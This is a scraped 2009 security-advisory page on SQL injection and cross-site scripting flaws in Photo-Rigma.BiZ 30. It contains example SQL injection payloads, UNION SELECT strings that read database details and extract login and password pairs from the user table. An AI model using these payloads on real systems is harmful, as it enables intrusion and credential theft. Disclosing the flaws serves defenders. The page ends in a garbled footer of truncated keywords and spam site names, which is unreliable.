about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Photo-Rigma.BiZ SQL Injection and Cross Site Scripting Vulnerabilities


Title Photo-Rigma.BiZ SQL Injection and Cross Site Scripting Vulnerabilities
Published 2009-04-24-12:00AM
Updated 2009-04-27-06:36PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  YEnH4ckEr
Vulnerable  Gold Rigma PhotoRigma.BiZ 30
Not Vulnerable  
Code  An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.The following example URI is available:http://www.example.com/[HOME_PATH]/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,version(),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*The following example data is available for the 'Search' field SQL-injection issue:%' AND 0 UNION ALL SELECT 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
%' AND 0 UNION ALL SELECT 1,2,3,concat(login,'<<::>>',password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 FROM user WHERE id=1#The following example data is available for the 'Search' field cross-site scripting issue:
  • /data/vulnerabilities/exploits/34709.txt
  • TXT  t3xt 1t!


    Advertising

    Copyright 2007, SecurityDot
    Thu, 10 Dec 2009 16:11:22 +0000

    Friends : milw0rm.com , secunia.com , securityfocus.com
    GOOGLE
    NEWS EXPLOITS VULNS
    exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
    skyridr Ir3x www.cnwanl erzhong.te www.sex24. Asian4yuo www.97ship www.zhuany xpersiya errors.php CMS is Fre www.sanfut Video sxs syscp erotis bizrobot.c Top of the Asian4yuo 104 www.wanli0 C...-relea eroti foto www.snb365 eros ramaz sexd anima uol www.mu-yin eqdpk news for c www.wanli0 C\r\n2199\ wuliaowang Joomla Com enthrallwe redaxo3_0_ download n ptr www.wanli0 enterasys www.zhangm bigxxx www.wanli0 Sexey girl ense Burning Bo www.nankey www.sexsee news+for+c english se /search/ex